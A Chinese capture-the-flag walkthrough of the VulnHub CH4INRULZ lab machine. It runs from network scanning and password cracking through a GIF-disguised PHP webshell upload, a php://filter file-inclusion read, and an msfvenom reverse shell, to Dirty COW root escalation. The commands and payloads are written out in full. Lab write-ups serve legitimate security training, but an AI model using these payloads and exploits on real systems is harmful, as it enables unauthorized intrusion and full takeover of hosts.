vulnhub CH4INRULZ靶场

1.信息收集

扫描主机

sudo arp-scan -l

图片[1] - vulnhub CH4INRULZ靶场 - MaxSSL

扫描端口

nmap -p- 192.168.42.151

图片[2] - vulnhub CH4INRULZ靶场 - MaxSSL

查看端口服务

nmap -A -sV -p 21,22,80,8011

图片[3] - vulnhub CH4INRULZ靶场 - MaxSSL

图片[4] - vulnhub CH4INRULZ靶场 - MaxSSL

21端口 ftp 没有有效信息,所以重点在80,8011

2.漏洞挖掘

开始网站浏览

图片[5] - vulnhub CH4INRULZ靶场 - MaxSSL

没找到有用信息,开始网站目录搜索(因为默认为80端口,所以我们要扫描8011端口)

dirb http://192.168.42.151

dirb http://192.168.42.151:8011

图片[6] - vulnhub CH4INRULZ靶场 - MaxSSL

图片[7] - vulnhub CH4INRULZ靶场 - MaxSSL

dirb http://192.168.42.151 -X .bak

图片[8] - vulnhub CH4INRULZ靶场 - MaxSSL

查看源代码,发现敏感目录,登录账号

cat index.html.bak

192.168.42.151/development/

图片[9] - vulnhub CH4INRULZ靶场 - MaxSSL

发现密码格式不对,暴力破解密码成功
john 1.txt

图片[10] - vulnhub CH4INRULZ靶场 - MaxSSL

登录deve界面,读题发现上传。

图片[11] - vulnhub CH4INRULZ靶场 - MaxSSL

访问/api页面,发现文件包含漏洞,尝试利用

图片[12] - vulnhub CH4INRULZ靶场 - MaxSSL

get型的利用被WAF了

图片[13] - vulnhub CH4INRULZ靶场 - MaxSSL

3.漏洞利用

找到上传口

192.168.42.151/development/uploader/

图片[14] - vulnhub CH4INRULZ靶场 - MaxSSL

3.1msf生成php木马

msfvenom -p php/reverse_php lhost=192.168.42.151 lport=8888 -o shell.php

是反弹shell,写自己地址

图片[15] - vulnhub CH4INRULZ靶场 - MaxSSL

3.2kali自带的php木马

/usr/share/webshells/php/

图片[16] - vulnhub CH4INRULZ靶场 - MaxSSL

改前面GIF98,后缀.gif

图片[17] - vulnhub CH4INRULZ靶场 - MaxSSL

木马上传成功

图片[18] - vulnhub CH4INRULZ靶场 - MaxSSL

找不到上传路径,继续文件包含

图片[19] - vulnhub CH4INRULZ靶场 - MaxSSL

尝试读取源代码

php伪协议

尝试读取源代码

file=php://filter/convert.base64-encode/resource=/var/www/development/uploader/upload.php

图片[20] - vulnhub CH4INRULZ靶场 - MaxSSL

得到源代码,发现上传路径

 500000) {  echo "Sorry, your file is too large.";  $uploadOk = 0;}// Allow certain file formatsif($imageFileType != "jpg" && $imageFileType != "png" && $imageFileType != "jpeg"&& $imageFileType != "gif" ) {  echo "Sorry, only JPG, JPEG, PNG & GIF files are allowed.";  $uploadOk = 0;}// Check if $uploadOk is set to 0 by an errorif ($uploadOk == 0) {  echo "Sorry, your file was not uploaded.";// if everything is ok, try to upload file} else {  if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {    echo "The file ". basename( $_FILES["fileToUpload"]["name"]). " has been uploaded to my uploads path.";  } else {    echo "Sorry, there was an error uploading your file.";  }}?>

用文件包含目录调用木马

file=/var/www/development/uploader/FRANKuploads/shell.gif

图片[21] - vulnhub CH4INRULZ靶场 - MaxSSL

反弹shell

图片[22] - vulnhub CH4INRULZ靶场 - MaxSSL

4.提升权限

查看内核版本,内核提权

uname -a

图片[23] - vulnhub CH4INRULZ靶场 - MaxSSL

在漏洞库中查找(脏牛提权)

searchsploit dirty

图片[24] - vulnhub CH4INRULZ靶场 - MaxSSL

下载提权脚本

searchsploit -m linux/local/40839.c

图片[25] - vulnhub CH4INRULZ靶场 - MaxSSL

上传脚本(nc 上传)

攻击机

图片[26] - vulnhub CH4INRULZ靶场 - MaxSSL

受害机

图片[27] - vulnhub CH4INRULZ靶场 - MaxSSL

在受害机编译脚本

gcc -pthread dirty.c -o dirty -lcrypt

图片[28] - vulnhub CH4INRULZ靶场 - MaxSSL

执行脚本(可以先看看有没有执行权限)

./dirty 123456

看见firefart用户就成功

图片[29] - vulnhub CH4INRULZ靶场 - MaxSSL

提权成功

su firefart

图片[30] - vulnhub CH4INRULZ靶场 - MaxSSL

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享